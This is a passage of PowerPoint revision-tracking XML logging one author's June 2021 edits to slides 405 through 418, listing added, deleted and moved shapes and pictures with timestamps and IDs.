          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="464350271" sldId="405"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="464350271" sldId="405"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:19.718" v="863" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="464350271" sldId="405"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="464350271" sldId="405"/>
            <ac:spMk id="3" creationId="{AA5217CB-2CF7-484C-BA65-76D53A2D34C3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="464350271" sldId="405"/>
            <ac:spMk id="5" creationId="{3B7DD1A7-7316-4CDF-AF29-FCFACA3274F4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:45:18.017" v="1147" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="464350271" sldId="405"/>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2093752077" sldId="406"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2093752077" sldId="406"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:29.957" v="867" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2093752077" sldId="406"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2093752077" sldId="406"/>
            <ac:spMk id="3" creationId="{633CD167-06B9-475B-B03B-2DDFC9686F29}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2093752077" sldId="406"/>
            <ac:spMk id="5" creationId="{C3D6864A-10D0-4E03-9F02-E3D9B9A89DDB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T22:39:39.876" v="195" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2093752077" sldId="406"/>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1972666229" sldId="407"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1972666229" sldId="407"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:34.069" v="868" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1972666229" sldId="407"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1972666229" sldId="407"/>
            <ac:spMk id="3" creationId="{A7BC39CC-48D1-493D-B5B4-A4B9C4D7E93F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1972666229" sldId="407"/>
            <ac:spMk id="5" creationId="{ACAFD2D5-FFC8-4428-9C7E-C7716B86C71F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T22:56:45.429" v="407" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1972666229" sldId="407"/>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2980641166" sldId="408"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2980641166" sldId="408"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:36.261" v="869" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2980641166" sldId="408"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2980641166" sldId="408"/>
            <ac:spMk id="3" creationId="{37740AC6-974C-4D86-8277-6E33AD357763}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2980641166" sldId="408"/>
            <ac:spMk id="5" creationId="{90D8DCEC-83A9-448D-AF76-DD5C915424E7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3277870470" sldId="409"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3277870470" sldId="409"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:37.598" v="870" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3277870470" sldId="409"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3277870470" sldId="409"/>
            <ac:spMk id="3" creationId="{D3E0FC1D-0FA8-4B9F-A03A-32755F17EFAD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3277870470" sldId="409"/>
            <ac:spMk id="5" creationId="{04A590CC-0352-48E0-937E-DB577EFE7F9F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add del mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2489270501" sldId="411"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2489270501" sldId="411"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2489270501" sldId="411"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2489270501" sldId="411"/>
            <ac:spMk id="4" creationId="{9E0ABBD1-EFCE-4409-9BF0-98378466F2AD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2489270501" sldId="411"/>
            <ac:spMk id="5" creationId="{440C9242-84D1-4BD1-AA7D-6AA3D094B89E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2489270501" sldId="411"/>
            <ac:spMk id="6" creationId="{10884825-35E7-42F3-B2EC-61CCCB9AC11D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2489270501" sldId="411"/>
            <ac:spMk id="7" creationId="{9029EBD6-9020-4FA5-A207-E10BCF67C534}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3881480386" sldId="413"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3881480386" sldId="413"/>
            <ac:spMk id="2" creationId="{D43DA5DC-802C-4549-AB66-4F536F732211}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3881480386" sldId="413"/>
            <ac:spMk id="3" creationId="{BA9D9051-4CF1-4024-902A-9501C787CA33}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3881480386" sldId="413"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:51:50.179" v="1171" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3881480386" sldId="413"/>
            <ac:picMk id="7"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3118374455" sldId="414"/>
        </pc:sldMkLst>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:46.070" v="872" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3118374455" sldId="414"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3118374455" sldId="414"/>
            <ac:spMk id="2" creationId="{786C41F0-05FC-4587-917D-47CFD26898C9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3118374455" sldId="414"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3118374455" sldId="414"/>
            <ac:spMk id="5" creationId="{7F54E03F-0B6E-4F7C-A9D2-B8A79B9F4919}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="214186708" sldId="415"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="214186708" sldId="415"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:39.293" v="871" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="214186708" sldId="415"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="214186708" sldId="415"/>
            <ac:spMk id="3" creationId="{7DE19CCD-65C3-4F3E-87D0-853964508BEE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="214186708" sldId="415"/>
            <ac:spMk id="5" creationId="{53C2C27E-9E6C-4DAF-BED0-925F09D3CAFD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4266318337" sldId="416"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4266318337" sldId="416"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:24.502" v="865" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4266318337" sldId="416"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4266318337" sldId="416"/>
            <ac:spMk id="3" creationId="{9D8D933B-1B24-476A-AEB1-6284BBC1BC78}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4266318337" sldId="416"/>
            <ac:spMk id="4" creationId="{73632835-DADF-43F1-8D32-289269B849F6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:45:50.018" v="1151" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4266318337" sldId="416"/>
            <ac:picMk id="7"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1453023660" sldId="417"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453023660" sldId="417"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:22.326" v="864" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453023660" sldId="417"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453023660" sldId="417"/>
            <ac:spMk id="3" creationId="{C407F75E-8E94-41E0-AA5E-E47E55E115D5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453023660" sldId="417"/>
            <ac:spMk id="4" creationId="{485B9890-9D9F-4CBD-A28B-DADCAD1FB579}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:45:33.253" v="1148" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453023660" sldId="417"/>
            <ac:picMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:45:36.851" v="1149" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1453023660" sldId="417"/>
            <ac:cxnSpMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4247754591" sldId="418"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4247754591" sldId="418"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:57:48.645" v="873" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4247754591" sldId="418"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
